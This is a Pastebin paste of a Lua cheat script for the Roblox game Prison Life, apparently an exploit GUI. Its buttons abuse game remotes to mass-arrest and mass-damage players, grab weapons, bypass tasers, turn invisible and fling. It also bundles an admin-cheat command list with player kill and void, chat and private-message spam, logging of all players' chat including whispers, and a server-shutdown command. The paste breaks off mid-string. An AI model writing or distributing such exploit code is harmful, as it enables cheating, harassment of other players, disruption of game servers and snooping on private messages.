Advertisement
Guest User

Super Prison Breaker [EXTREME]

a guest
Jun 18th, 2019
12,146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 237.97 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local PrisonBreakerv15 = Instance.new("ScreenGui")
  5. local openmain = Instance.new("Frame")
  6. local open = Instance.new("TextButton")
  7. local main = Instance.new("Frame")
  8. local title = Instance.new("TextLabel")
  9. local close = Instance.new("TextButton")
  10. local police = Instance.new("TextButton")
  11. local inmate = Instance.new("TextButton")
  12. local neutral = Instance.new("TextButton")
  13. local arrestcrims = Instance.new("TextButton")
  14. local invis = Instance.new("TextButton")
  15. local superpunch = Instance.new("TextButton")
  16. local guns = Instance.new("TextButton")
  17. local taserbypass = Instance.new("TextButton")
  18. local fling = Instance.new("TextButton")
  19. local reviz = Instance.new("TextButton")
  20. local arrest = Instance.new("TextButton")
  21. local attach = Instance.new("TextButton")
  22. local fastrem = Instance.new("TextButton")
  23. local fastm9 = Instance.new("TextButton")
  24. local fasttaze = Instance.new("TextButton")
  25. local fastak = Instance.new("TextButton")
  26. local killall = Instance.new("TextButton")
  27. local btools = Instance.new("TextButton")
  28. local speed = Instance.new("TextButton")
  29. local respawn = Instance.new("TextButton")
  30. local Credits = Instance.new("TextButton")
  31. local prison = Instance.new("TextButton")
  32. local yard = Instance.new("TextButton")
  33. local crimbase = Instance.new("TextButton")
  34. local title_2 = Instance.new("TextLabel")
  35. local bringall = Instance.new("TextButton")
  36. local drill = Instance.new("TextButton")
  37. local killplrmain = Instance.new("Frame")
  38. local killtext = Instance.new("TextBox")
  39. local kill = Instance.new("TextButton")
  40. local waves = Instance.new("TextButton")
  41. local bigbowl = Instance.new("TextButton")
  42. local tazeplrmain = Instance.new("Frame")
  43. local tazetext = Instance.new("TextBox")
  44. local taze = Instance.new("TextButton")
  45. local teamcrim = Instance.new("TextButton")
  46. local tazeall = Instance.new("TextButton")
  47. local removewalls = Instance.new("TextButton")
  48. local removeall = Instance.new("TextButton")
  49. local lagserver = Instance.new("TextButton")
  50. --Properties:
  51. PrisonBreakerv15.Name = "PrisonBreaker v1.5"
  52. PrisonBreakerv15.Parent = game.CoreGui
  53.  
  54. openmain.Name = "openmain"
  55. openmain.Parent = PrisonBreakerv15
  56. openmain.BackgroundColor3 = Color3.new(0, 0, 0)
  57. openmain.Position = UDim2.new(0.00434467755, 0, 0.397959173, 0)
  58. openmain.Size = UDim2.new(0, 100, 0, 27)
  59. openmain.Visible = false
  60.  
  61. open.Name = "open"
  62. open.Parent = openmain
  63. open.BackgroundColor3 = Color3.new(1, 1, 0)
  64. open.Position = UDim2.new(1.49011612e-08, 0, 0, 0)
  65. open.Size = UDim2.new(0, 100, 0, 27)
  66. open.Style = Enum.ButtonStyle.RobloxRoundButton
  67. open.Font = Enum.Font.GothamBold
  68. open.Text = "OPEN"
  69. open.TextColor3 = Color3.new(0, 0, 0)
  70. open.TextSize = 14
  71. open.MouseButton1Down:connect(function()
  72. openmain.Visible = false
  73. main.Visible = true
  74. end)
  75.  
  76. main.Name = "main"
  77. main.Parent = PrisonBreakerv15
  78. main.BackgroundColor3 = Color3.new(0, 1, 0)
  79. main.Position = UDim2.new(0.00441803597, 0, 0.249908596, 0)
  80. main.Size = UDim2.new(0, 383, 0, 586)
  81. main.Style = Enum.FrameStyle.RobloxRound
  82. main.Active = true
  83. main.Draggable = true
  84.  
  85. title.Name = "title"
  86. title.Parent = main
  87. title.BackgroundColor3 = Color3.new(0, 0, 1)
  88. title.Position = UDim2.new(-0.0125168273, 0, -0.00528348284, 0)
  89. title.Size = UDim2.new(0, 376, 0, 50)
  90. title.Font = Enum.Font.GothamBold
  91. title.Text = "PrisonBreaker V1.5"
  92. title.TextColor3 = Color3.new(1, 1, 1)
  93. title.TextSize = 14
  94.  
  95. close.Name = "close"
  96. close.Parent = main
  97. close.BackgroundColor3 = Color3.new(0.333333, 0, 1)
  98. close.Position = UDim2.new(0.848563969, 0, -0.00557620823, 0)
  99. close.Size = UDim2.new(0, 59, 0, 50)
  100. close.Font = Enum.Font.GothamBold
  101. close.Text = "X"
  102. close.TextColor3 = Color3.new(0, 0, 0)
  103. close.TextSize = 14
  104. close.MouseButton1Down:connect(function()
  105. main.Visible = false
  106. openmain.Visible = true
  107. end)
  108.  
  109. police.Name = "police"
  110. police.Parent = main
  111. police.BackgroundColor3 = Color3.new(0, 0, 1)
  112. police.Position = UDim2.new(0.0143180238, 0, 0.108731732, 0)
  113. police.Size = UDim2.new(0, 84, 0, 22)
  114. police.Font = Enum.Font.GothamBold
  115. police.Text = "Team Police"
  116. police.TextColor3 = Color3.new(0, 0, 0)
  117. police.TextSize = 14
  118. police.MouseButton1Down:connect(function()
  119. workspace.Remote.TeamEvent:FireServer("Bright blue")
  120. end)
  121.  
  122. inmate.Name = "inmate"
  123. inmate.Parent = main
  124. inmate.BackgroundColor3 = Color3.new(1, 0.666667, 0)
  125. inmate.BorderColor3 = Color3.new(1, 0.666667, 0.0901961)
  126. inmate.Position = UDim2.new(0.270111769, 0, 0.107363492, 0)
  127. inmate.Size = UDim2.new(0, 84, 0, 22)
  128. inmate.Font = Enum.Font.GothamBold
  129. inmate.Text = "Team Inmate"
  130. inmate.TextColor3 = Color3.new(0, 0, 0)
  131. inmate.TextSize = 14
  132. inmate.MouseButton1Down:connect(function()
  133. workspace.Remote.TeamEvent:FireServer("Bright orange")
  134. end)
  135.  
  136. neutral.Name = "neutral"
  137. neutral.Parent = main
  138. neutral.BackgroundColor3 = Color3.new(0.772549, 0.74902, 0.784314)
  139. neutral.Position = UDim2.new(0.525683641, 0, 0.106356524, 0)
  140. neutral.Size = UDim2.new(0, 83, 0, 22)
  141. neutral.Font = Enum.Font.GothamBold
  142. neutral.Text = "Team Neutral"
  143. neutral.TextColor3 = Color3.new(0, 0, 0)
  144. neutral.TextSize = 14
  145. neutral.TextStrokeColor3 = Color3.new(0.333333, 1, 0)
  146. neutral.MouseButton1Down:connect(function()
  147. Workspace.Remote.TeamEvent:FireServer("Medium stone grey")
  148. end)
  149.  
  150. arrestcrims.Name = "arrestcrims"
  151. arrestcrims.Parent = main
  152. arrestcrims.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  153. arrestcrims.Position = UDim2.new(0.0124716684, 0, 0.160733104, 0)
  154. arrestcrims.Size = UDim2.new(0, 111, 0, 31)
  155. arrestcrims.Font = Enum.Font.GothamBold
  156. arrestcrims.Text = "Arrest Crims"
  157. arrestcrims.TextColor3 = Color3.new(1, 0, 0)
  158. arrestcrims.TextSize = 14
  159. arrestcrims.MouseButton1Down:connect(function()
  160. local Player = game.Players.LocalPlayer
  161. local cpos = Player.Character.HumanoidRootPart.CFrame
  162. for i,v in pairs(game.Teams.Criminals:GetPlayers()) do
  163. if v.Name ~= Player.Name then
  164. local i = 10
  165.     repeat
  166.     wait()
  167.     i = i-1
  168.     game.Workspace.Remote.arrest:InvokeServer(v.Character.HumanoidRootPart)
  169.     Player.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, 1)
  170.     until i == 0
  171. end
  172. end
  173. Player.Character.HumanoidRootPart.CFrame = cpos
  174. Notify("Success", "Arrested all of the n00bs", "Cool!")
  175. end)
  176.  
  177. invis.Name = "invis"
  178. invis.Parent = main
  179. invis.BackgroundColor3 = Color3.new(0, 1, 1)
  180. invis.Position = UDim2.new(0.348153055, 0, 0.160733074, 0)
  181. invis.Size = UDim2.new(0, 111, 0, 31)
  182. invis.Font = Enum.Font.GothamBold
  183. invis.Text = "Invisible"
  184. invis.TextColor3 = Color3.new(1, 0, 0)
  185. invis.TextSize = 14
  186. invis.MouseButton1Down:connect(function()
  187. local player = game.Players.LocalPlayer
  188. position     = player.Character.HumanoidRootPart.Position
  189. wait(0.1)
  190. player.Character:MoveTo(position + Vector3.new(0, 1000000, 0))
  191. wait(0.1)
  192. humanoidrootpart = player.Character.HumanoidRootPart:clone()
  193. wait(0.1)
  194. player.Character.HumanoidRootPart:Destroy()
  195. humanoidrootpart.Parent = player.Character
  196. player.Character:MoveTo(position)
  197. wait()
  198. -- Remove this if you want to see yourself (others still won't see you)
  199. game.Players.LocalPlayer.Character.Torso.Transparency = 1
  200. game.Players.LocalPlayer.Character.Head.Transparency  = 1
  201. game.Players.LocalPlayer.Character["Left Arm"].Transparency = 1
  202. game.Players.LocalPlayer.Character["Right Arm"].Transparency = 1
  203. game.Players.LocalPlayer.Character["Left Leg"].Transparency = 1
  204. game.Players.LocalPlayer.Character["Right Leg"].Transparency = 1
  205. game.Players.LocalPlayer.Character.Humanoid:RemoveAccessories()
  206. game.Players.LocalPlayer.Character.Head.face:Remove()
  207. end)
  208.  
  209. superpunch.Name = "superpunch"
  210. superpunch.Parent = main
  211. superpunch.BackgroundColor3 = Color3.new(0, 1, 1)
  212. superpunch.Position = UDim2.new(0.678248107, 0, 0.160733074, 0)
  213. superpunch.Size = UDim2.new(0, 111, 0, 31)
  214. superpunch.Font = Enum.Font.GothamBold
  215. superpunch.Text = "SuperPunch"
  216. superpunch.TextColor3 = Color3.new(1, 0, 0)
  217. superpunch.TextSize = 14
  218. superpunch.MouseButton1Down:connect(function()
  219. mainRemotes = game.ReplicatedStorage meleeRemote = mainRemotes['meleeEvent'] mouse = game.Players.LocalPlayer:GetMouse() punching = false cooldown = false function punch() cooldown = true local part = Instance.new("Part", game.Players.LocalPlayer.Character) part.Transparency = 1 part.Size = Vector3.new(5, 2, 3) part.CanCollide = false local w1 = Instance.new("Weld", part) w1.Part0 = game.Players.LocalPlayer.Character.Torso w1.Part1 = part w1.C1 = CFrame.new(0,0,2) part.Touched:connect(function(hit) if game.Players:FindFirstChild(hit.Parent.Name) then local plr = game.Players:FindFirstChild(hit.Parent.Name) if plr.Name ~= game.Players.LocalPlayer.Name then part:Destroy() for i = 1,100 do meleeRemote:FireServer(plr) end end end end) wait(1) cooldown = false part:Destroy() end mouse.KeyDown:connect(function(key) if cooldown == false then if key:lower() == "f" then punch() end end end)
  220. end)
  221.  
  222. guns.Name = "guns"
  223. guns.Parent = main
  224. guns.BackgroundColor3 = Color3.new(0, 1, 1)
  225. guns.Position = UDim2.new(0.0124716703, 0, 0.2304198, 0)
  226. guns.Size = UDim2.new(0, 111, 0, 32)
  227. guns.Font = Enum.Font.GothamBlack
  228. guns.Text = "Guns"
  229. guns.TextColor3 = Color3.new(1, 0, 0)
  230. guns.TextSize = 14
  231. guns.MouseButton1Down:connect(function()
  232. for i,v in pairs(Workspace.Prison_ITEMS.giver:GetChildren()) do
  233.  
  234. lol = Workspace.Remote.ItemHandler:InvokeServer(v.ITEMPICKUP)
  235. print(lol)
  236. end
  237. end)
  238.  
  239. taserbypass.Name = "taserbypass"
  240. taserbypass.Parent = main
  241. taserbypass.BackgroundColor3 = Color3.new(0, 1, 1)
  242. taserbypass.Position = UDim2.new(0.348080158, 0, 0.2304198, 0)
  243. taserbypass.Size = UDim2.new(0, 111, 0, 32)
  244. taserbypass.Font = Enum.Font.GothamBold
  245. taserbypass.Text = "Taser Bypass"
  246. taserbypass.TextColor3 = Color3.new(1, 0, 0)
  247. taserbypass.TextSize = 14
  248. taserbypass.MouseButton1Down:connect(function()
  249. game.Players.LocalPlayer.Character.ClientInputHandler.Disabled = true
  250.    game.Players.LocalPlayer.CharacterAdded:connect(function()
  251.    game.Workspace:WaitForChild(game.Players.LocalPlayer.Name)
  252.    game.Players.LocalPlayer.Character.ClientInputHandler.Disabled = true
  253.    end)
  254.    local message = Instance.new("Message",game.Workspace)
  255.    message.Text = 'Made By Jake11price'
  256.    wait(2)
  257.    message:Destroy()
  258. end)
  259.  
  260. fling.Name = "fling"
  261. fling.Parent = main
  262. fling.BackgroundColor3 = Color3.new(0.333333, 1, 1)
  263. fling.Position = UDim2.new(0.00984076969, 0, 0.379423141, 0)
  264. fling.Size = UDim2.new(0, 111, 0, 32)
  265. fling.Font = Enum.Font.GothamBold
  266. fling.Text = "Fling"
  267. fling.TextColor3 = Color3.new(1, 0, 0)
  268. fling.TextSize = 14
  269. fling.MouseButton1Down:connect(function()
  270. power = 300 -- change this to make it more or less powerful
  271.  
  272. game:GetService('RunService').Stepped:connect(function()
  273. game.Players.LocalPlayer.Character.Head.CanCollide = false
  274. game.Players.LocalPlayer.Character.Torso.CanCollide = false
  275. game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false
  276. game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false
  277. end)
  278.  
  279. wait(.1)
  280. local bambam = Instance.new("BodyThrust")
  281. bambam.Parent = game.Players.LocalPlayer.Character.HumanoidRootPart
  282. bambam.Force = Vector3.new(power,0,power)
  283. bambam.Location = game.Players.LocalPlayer.Character.HumanoidRootPart.Position
  284. end)
  285.  
  286. reviz.Name = "reviz"
  287. reviz.Parent = main
  288. reviz.BackgroundColor3 = Color3.new(0, 1, 1)
  289. reviz.Position = UDim2.new(0.0121497028, 0, 0.303878158, 0)
  290. reviz.Size = UDim2.new(0, 111, 0, 32)
  291. reviz.Font = Enum.Font.GothamBold
  292. reviz.Text = "Reviz Admin"
  293. reviz.TextColor3 = Color3.new(1, 0, 0)
  294. reviz.TextSize = 14
  295. reviz.MouseButton1Down:connect(function()
  296. -- Creator: illremember#3799
  297.  
  298. -- Credits to infinite yield, harkinian, dex creators
  299.  
  300. prefix = ";"
  301. wait(0.3)
  302. Commands = {
  303.     '[-] cmdbar is shown when ; is pressed.',
  304.     '[1] kill [plr] -- You need a tool! Will kill the player, use rkill to kill you and player',
  305.     '[2] bring [plr] -- You need a tool! Will bring player to you',
  306.     '[3] spin [plr] -- You need a tool! Makes you and the player spin crazy',
  307.     '[4] unspin -- Use after using spin cmd and dying, so you stop loop teleporting',
  308.     '[5] attach [plr] -- You need a tool! Attaches you to player',
  309.     '[6] unattach [plr] -- Attempts to unattach you from a player',
  310.     '[7] follow [plr] -- Makes you follow behind the player',
  311.     '[8] unfollow',
  312.     '[9] freefall [plr] -- You need a tool! Teleports you and the player up into the air',
  313.     '[10] trail [plr] -- The opposite of follow, you stay infront of player',
  314.     '[11] untrail',
  315.     '[12] orbit [plr] -- Makes you orbit the player',
  316.     '[13] unorbit',
  317.     '[14] fling [plr] -- Makes you fling the player',
  318.     '[15] unfling',
  319.     '[16] fecheck -- Checks if the game is FE or not',
  320.     '[17] void [plr] -- Teleports player to the void',
  321.     '[18] noclip -- Gives you noclip to walk through walls',
  322.     '[19] clip -- Removes noclip',
  323.     '[20] speed [num]/ws [num] -- Changes how fast you walk 16 is default',
  324.     '[21] jumppower [num]/jp [num] -- Changes how high you jump 50 is default',
  325.     '[22] hipheight [num]/hh [num] -- Changes how high you float 0 is default',
  326.     '[23] default -- Changes your speed, jumppower and hipheight to default values',
  327.     '[24] annoy [plr] -- Loop teleports you to the player',
  328.     '[25] unannoy',
  329.     '[26] headwalk [plr] -- Loop teleports you to the player head',
  330.     '[27] unheadwalk',
  331.     '[28] nolimbs -- Removes your arms and legs',
  332.     '[29] god -- Gives you FE Godmode',
  333.     '[30] drophats -- Drops your accessories',
  334.     '[31] droptool -- Drops any tool you have equipped',
  335.     '[32] loopdhats -- Loop drops your accessories',
  336.     '[33] unloopdhats',
  337.     '[34] loopdtool -- Loop drops any tools you have equipped',
  338.     '[35] unloopdtool',
  339.     '[36] invisible -- Gives you invisibility CREDIT TO TIMELESS',
  340.     '[37] view [plr] -- Changes your camera to the player character',
  341.     '[38] unview',
  342.     '[39] goto [plr] -- Teleports you to player',
  343.     '[40] fly -- Allows you to fly, credit to Infinite Yield',
  344.     '[41] unfly',
  345.     '[42] chat [msg] -- Makes you chat a message',
  346.     '[43] spam [msg] -- Spams a message',
  347.     '[44] unspam',
  348.     '[45] spamwait [num] -- Changes delay of chatting a message for the spam command in seconds default is 1 second',
  349.     '[46] pmspam [plr] -- Spams a player in private message',
  350.     '[47] unpmspam',
  351.     '[48] cfreeze [plr] -- Freezes a player on your client, they will only be frozen for you',
  352.     '[49] uncfreeze [plr]',
  353.     '[50] unlockws -- Unlocks the workspace',
  354.     '[51] lockws -- Locks the workspace',
  355.     '[52] btools -- Gives you btools that will only show to you useful for deleting certain blocks only for you',
  356.     '[53] pstand -- Enables platform stand',
  357.     '[54] unpstand -- Disables platform stand',
  358.     '[55] blockhead -- Removes your head mesh',
  359.     '[56] sit',
  360.     '[57] bringobj [obj] -- Only shows on client, brings an object/part to you constantly, can be used to bring healing parts, weapons, money etc, type in exact name',
  361.     '[58] wsvis [num] -- Changes visibility of workspace parts, num should be between 0 and 1, only shows client sided',
  362.     '[59] hypertotal -- Loads in my FE GUI Hypertotal',
  363.     '[60] cmds -- Prints all commands',
  364.     '[61] rmeshhats/blockhats -- Removes the meshes of all your accessories aka block hats',
  365.     '[62] rmeshtool/blocktool -- Removes the mesh of the tool you have equipped aka block tool',
  366.     '[63] spinner -- Makes you spin',
  367.     '[64] nospinner',
  368.     '[65] reach [num] -- Gives you reach, mostly used for swords, say ;reachd for default and enter number after for custom',
  369.     '[66] noreach -- Removes reach, must have tool equipped',
  370.     '[67] rkill [plr] -- Kills you and the player, use kill to just kill the player without dying',
  371.     '[68] tp me [plr] -- Alternative to goto',
  372.     '[69] cbring [plr] -- Brings player infront of you, shows only on client, allows you to do damage to player',
  373.     '[70] uncbring',
  374.     '[71] swap [plr] -- You need a tool! Swaps players position with yours and your position with players',
  375.     '[72] givetool [plr] -- Gives the tool you have equipped to the player',
  376.     '[73] glitch [plr] -- Glitches you and the player, looks very cool',
  377.     '[74] unglitch -- Unglitches you',
  378.     '[75] grespawn -- Alternative to normal respawn and usually works best for when you want to reset with FE Godmode',
  379.     '[76] explorer -- Loads up DEX',
  380.     '[77] reset -- Resets your character.',
  381.     '[78] anim [id] -- Applies an animation on you, must be created by ROBLOX',
  382.     '[79] animgui -- Loads up Energize animations GUI',
  383.     '[80] savepos -- Saves your current position',
  384.     '[81] loadpos -- Teleports you to your saved position',
  385.     '[82] bang [plr] -- 18+ will not work if you have FE Godmode on',
  386.     '[83] unbang',
  387.     '[84] delcmdbar -- Removes the command bar completely',
  388.     '[85] bringmod [obj] -- Brings all the parts in a model, client only, comes from ;bringobj enter exact name of model',
  389.     '[86] shutdown -- Uses harkinians script to shutdown server',
  390.     '[87] respawn -- If grespawn doesnt work you can use respawn',
  391.     '[88] delobj [obj] -- Deletes a certain brick in workspace, client sided',
  392.     '[89] getplrs -- Prints all players in game',
  393.     '[90] deldecal -- Deletes all decals client sided',
  394.     '[91] opfinality -- Loads in my FE GUI Opfinality',
  395.     '[92] remotes -- Prints all remotes in the game in the console when added',
  396.     '[93] noremotes -- Stops printing remotes',
  397.     '[94] tpdefault -- Stops all loop teleports to a player',
  398.     '[95] stopsit -- Will not allow you to sit',
  399.     '[96] gosit -- Allows you to sit',
  400.     '[97] clicktp -- Enables click tp',
  401.     '[98] noclicktp -- Disables click tp',
  402.     '[99] toolson -- If any tools are dropped in the workspace you will automatically get them',
  403.     '[100] toolsoff -- Stops ;toolson',
  404.     '[101] version -- Gets the admin version',
  405.     '[102] state [num] -- Changes your humanoid state, ;unstate to stop.',
  406.     '[103] gravity [num] -- Changes workspace gravity default is 196.2',
  407.     '[104] pgs -- Checks if the game has PGSPhysicsSolverEnabled enabled',
  408.     '[105] clickdel -- Delete any block you press q on, client sided',
  409.     '[106] noclickdel -- Stops clickdel',
  410.     '[107] looprhats -- Loop removes mesh of your hats/loop block hats',
  411.     '[108] unlooprhats -- Stops loop removing mesh',
  412.     '[109] looprtool -- Loop removes mesh of your tool/loop block tools',
  413.     '[110] unlooprtool -- Stops loop removing mesh',
  414.     '[111] givealltools [plr] -- Gives all the tools you have in your backpack to the player',
  415.     '[112] age [plr] -- Makes you chat the account age of the player',
  416.     '[113] id [plr] -- Makes you chat the account ID of the player',
  417.     '[114] .age [plr] -- Privately shows you the account age of the player',
  418.     '[115] .id [plr] -- Privately shows you the account ID of the player',
  419.     '[116] gameid -- Shows the game ID',
  420.     '[117] removeinvis -- Removes all invisible walls/parts, client sided',
  421.     '[118] removefog -- Removes fog, client sided',
  422.     '[119] disable -- Disables your character by removing humanoid',
  423.     '[120] enable -- Enables your character by adding humanoid',
  424.     '[121] prefix [key] -- Changes the prefix used, default is ;',
  425.     '[122] ;resetprefix -- Resets the prefix to ; incase you change it to an unusable prefix. Say exactly ";resetprefix" to do this command, no matter what your prefix is set to.',
  426.     '[123] flyspeed [num] -- Change your fly speed, default is 1',
  427.     '[124] carpet [plr] -- Makes you a carpet for a player, will not work if FE Godmode is on',
  428.     '[125] uncarpet -- Stops carpet player',
  429.     '[126] stare [plr] -- Turns your character to stare at another player',
  430.     '[127] unstare -- Stops stare player',
  431.     '[128] logchat -- Logs all chat (including /e and whispers) of all players',
  432.     '[129] unlogchat -- Disables logchat',
  433.     '[130] fixcam -- Fixes/resets your camera',
  434.     '[131] unstate -- Stops changing state',
  435. }
  436. speedget = 1
  437.  
  438. lplayer = game:GetService("Players").LocalPlayer
  439.  
  440. lplayer.CharacterAdded:Connect(function(character)
  441.     spin = false
  442.     flying = false
  443.     staring = false
  444.     banpl = false
  445. end)
  446.  
  447. function change()
  448.     prefix = prefix
  449.     speedfly = speedfly
  450. end
  451.  
  452. function GetPlayer(String) -- Credit to Timeless/xFunnieuss
  453.     local Found = {}
  454.     local strl = String:lower()
  455.     if strl == "all" then
  456.         for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  457.             table.insert(Found,v)
  458.         end
  459.     elseif strl == "others" then
  460.         for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  461.             if v.Name ~= lplayer.Name then
  462.                 table.insert(Found,v)
  463.             end
  464.         end  
  465.     elseif strl == "me" then
  466.         for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  467.             if v.Name == lplayer.Name then
  468.                 table.insert(Found,v)
  469.             end
  470.         end  
  471.     else
  472.         for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  473.             if v.Name:lower():sub(1, #String) == String:lower() then
  474.                 table.insert(Found,v)
  475.             end
  476.         end    
  477.     end
  478.     return Found    
  479. end
  480.  
  481. local Mouse = lplayer:GetMouse()
  482.  
  483. spin = false
  484. followed = false
  485. traill = false
  486. noclip = false
  487. annoying = false
  488. hwalk = false
  489. droppinghats = false
  490. droppingtools = false
  491. flying = false
  492. spamdelay = 1
  493. spamming = false
  494. spammingpm = false
  495. cbringing = false
  496. remotes = true
  497. added = true
  498. binds = false
  499. stopsitting = false
  500. clickgoto = false
  501. gettingtools = false
  502. removingmeshhats = false
  503. removingmeshtool = false
  504. clickdel = false
  505. staring = false
  506. chatlogs = false
  507. banpl = false
  508. changingstate = false
  509. statechosen = 0
  510.  
  511. adminversion = "Reviz Admin by illremember, Version 2.0"
  512.  
  513. flying = false
  514. speedfly = 1
  515.  
  516. function plrchat(plr, chat)
  517. print(plr.Name..": "..tick().."\n"..chat)
  518. end
  519.  
  520. for i,v in pairs(game:GetService("Players"):GetPlayers()) do
  521. v.Chatted:connect(function(chat)
  522. if chatlogs then
  523. plrchat(v, chat)
  524. end
  525. end)
  526. end
  527. game:GetService("Players").PlayerAdded:connect(function(plr)
  528. plr.Chatted:connect(function(chat)
  529. if chatlogs then
  530. plrchat(plr, chat)
  531. end
  532. end)
  533. end)
  534.  
  535.  
  536. local ScreenGui = Instance.new("ScreenGui")
  537. local Frame = Instance.new("Frame")
  538. local CMDBAR = Instance.new("TextBox")
  539. ScreenGui.Parent = game:GetService("CoreGui")
  540. Frame.Parent = ScreenGui
  541. Frame.BackgroundColor3 = Color3.new(0.3, 0.1, 0.1)
  542. Frame.BackgroundTransparency = 0.3
  543. Frame.Position = UDim2.new(0.5, 0, 0, 10)
  544. Frame.Size = UDim2.new(0, 200, 0, 40)
  545. Frame.Active = true
  546. Frame.Draggable = true
  547. CMDBAR.Name = "CMDBAR"
  548. CMDBAR.Parent = Frame
  549. CMDBAR.BackgroundColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  550. CMDBAR.BackgroundTransparency = 0.20000000298023
  551. CMDBAR.Size = UDim2.new(0, 180, 0, 20)
  552. CMDBAR.Position = UDim2.new(0.05, 0, 0.25, 0)
  553. CMDBAR.Font = Enum.Font.SourceSansLight
  554. CMDBAR.FontSize = Enum.FontSize.Size14
  555. CMDBAR.TextColor3 = Color3.new(0.945098, 0.945098, 0.945098)
  556. CMDBAR.TextScaled = true
  557. CMDBAR.TextSize = 14
  558. CMDBAR.TextWrapped = true
  559. CMDBAR.Text = "Press ; to type, Enter to execute"
  560.  
  561. local CMDS = Instance.new("ScreenGui")
  562. local CMDSFRAME = Instance.new("Frame")
  563. local ScrollingFrame = Instance.new("ScrollingFrame")
  564. local TextLabel = Instance.new("TextLabel")
  565. local closegui = Instance.new("TextButton")
  566. CMDS.Name = "CMDS"
  567. CMDS.Parent = game:GetService("CoreGui")
  568. CMDSFRAME.Name = "CMDSFRAME"
  569. CMDSFRAME.Parent = CMDS
  570. CMDSFRAME.Active = true
  571. CMDSFRAME.BackgroundColor3 = Color3.new(0.223529, 0.231373, 0.309804)
  572. CMDSFRAME.BorderSizePixel = 0
  573. CMDSFRAME.Draggable = true
  574. CMDSFRAME.Position = UDim2.new(0, 315, 0, 100)
  575. CMDSFRAME.Size = UDim2.new(0, 275, 0, 275)
  576. CMDSFRAME.Visible = false
  577. ScrollingFrame.Parent = CMDSFRAME
  578. ScrollingFrame.BackgroundColor3 = Color3.new(0.160784, 0.160784, 0.203922)
  579. ScrollingFrame.BorderSizePixel = 0
  580. ScrollingFrame.Position = UDim2.new(0, 0, 0.0729999989, 0)
  581. ScrollingFrame.Size = UDim2.new(1.04999995, 0, 0.92900002, 0)
  582. ScrollingFrame.CanvasSize = UDim2.new(0, 0, 10, 0)
  583. TextLabel.Parent = ScrollingFrame
  584. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  585. TextLabel.BackgroundTransparency = 1
  586. TextLabel.Size = UDim2.new(0.930000007, 0, 1, 0)
  587. TextLabel.Font = Enum.Font.SourceSans
  588. TextLabel.FontSize = Enum.FontSize.Size18
  589. TextLabel.Text = "[-] cmdbar is shown when ; is pressed.,\n[1] kill [plr] -- You need a tool! Will kill the player, use rkill to kill you and player,\n[2] bring [plr] -- You need a tool! Will bring player to you,\n[3] spin [plr] -- You need a tool! Makes you and the player spin crazy,\n[4] unspin -- Use after using spin cmd and dying, so you stop loop teleporting,\n[5] attach [plr] -- You need a tool! Attaches you to player,\n[6] unattach [plr] -- Attempts to unattach you from a player,\n[7] follow [plr] -- Makes you follow behind the player,\n[8] unfollow,\n[9] freefall [plr] -- You need a tool! Teleports you and the player up into the air,\n[10] trail [plr] -- The opposite of follow, you stay infront of player,\n[11] untrail,\n[12] orbit [plr] -- Makes you orbit the player,\n[13] unorbit,\n[14] fling [plr] -- Makes you fling the player,\n[15] unfling,\n[16] fecheck -- Checks if the game is FE or not,\n[17] void [plr] -- Teleports player to the void,\n[18] noclip -- Gives you noclip to walk through walls,\n[19] clip -- Removes noclip,\n[20] speed [num]/ws [num] -- Changes how fast you walk 16 is default,\n[21] jumppower [num]/jp [num] -- Changes how high you jump 50 is default,\n[22] hipheight [num]/hh [num] -- Changes how high you float 0 is default,\n[23] default -- Changes your speed, jumppower and hipheight to default values,\n[24] annoy [plr] -- Loop teleports you to the player,\n[25] unannoy,\n[26] headwalk [plr] -- Loop teleports you to the player head,\n[27] unheadwalk,\n[28] nolimbs -- Removes your arms and legs,\n[29] god -- Gives you FE Godmode,\n[30] drophats -- Drops your accessories,\n[31] droptool -- Drops any tool you have equipped,\n[32] loopdhats -- Loop drops your accessories,\n[33] unloopdhats,\n[34] loopdtool -- Loop drops any tools you have equipped,\n[35] unloopdtool,\n[36] invisible -- Gives you invisibility CREDIT TO TIMELESS,\n[37] view [plr] -- Changes your camera to the player character,\n[38] unview,\n[39] goto [plr] -- Teleports you to player,\n[40] fly -- Allows you to fly,\n[41] unfly,\n[42] chat [msg] -- Makes you chat a message,\n[43] spam [msg] -- Spams a message,\n[44] unspam,\n[45] spamwait [num] -- Changes delay of chatting a message for the spam command in seconds default is 1 second,\n[46] pmspam [plr] -- Spams a player in private message,\n[47] unpmspam,\n[48] cfreeze [plr] -- Freezes a player on your client, they will only be frozen for you,\n[49] uncfreeze [plr],\n[50] unlockws -- Unlocks the workspace,\n[51] lockws -- Locks the workspace,\n[52] btools -- Gives you btools that will only show to you useful for deleting certain blocks only for you,\n[53] pstand -- Enables platform stand,\n[54] unpstand -- Disables platform stand,\n[55] blockhead -- Removes your head mesh,\n[56] sit,\n[57] bringobj [obj] -- Only shows on client, brings an object/part to you constantly, can be used to bring healing parts, weapons, money etc, type in exact name,\n[58] wsvis [num] -- Changes visibility of workspace parts, num should be between 0 and 1, only shows client sided,\n[59] hypertotal -- Loads in my FE GUI Hypertotal,\n[60] cmds -- Prints all commands,\n[61] rmeshhats/blockhats -- Removes the meshes of all your accessories aka block hats,\n[62] rmeshtool/blocktool -- Removes the mesh of the tool you have equipped aka block tool,\n[63] spinner -- Makes you spin,\n[64] nospinner,\n[65] reach [num] -- Gives you reach, mostly used for swords, say ;reachd for default and enter number after for custom,\n[66] noreach -- Removes reach, must have tool equipped,\n[67] rkill [plr] -- Kills you and the player, use kill to just kill the player without dying,\n[68] tp me [plr] -- Alternative to goto,\n[69] cbring [plr] -- Brings player infront of you, shows only on client, allows you to do damage to player,\n[70] uncbring,\n[71] swap [plr] -- You need a tool! Swaps players position with yours and your position with players,\n[72] givetool [plr] -- Gives the tool you have equipped to the player,\n[73] glitch [plr] -- Glitches you and the player, looks very cool,\n[74] unglitch -- Unglitches you,\n[75] grespawn -- Alternative to normal respawn and usually works best 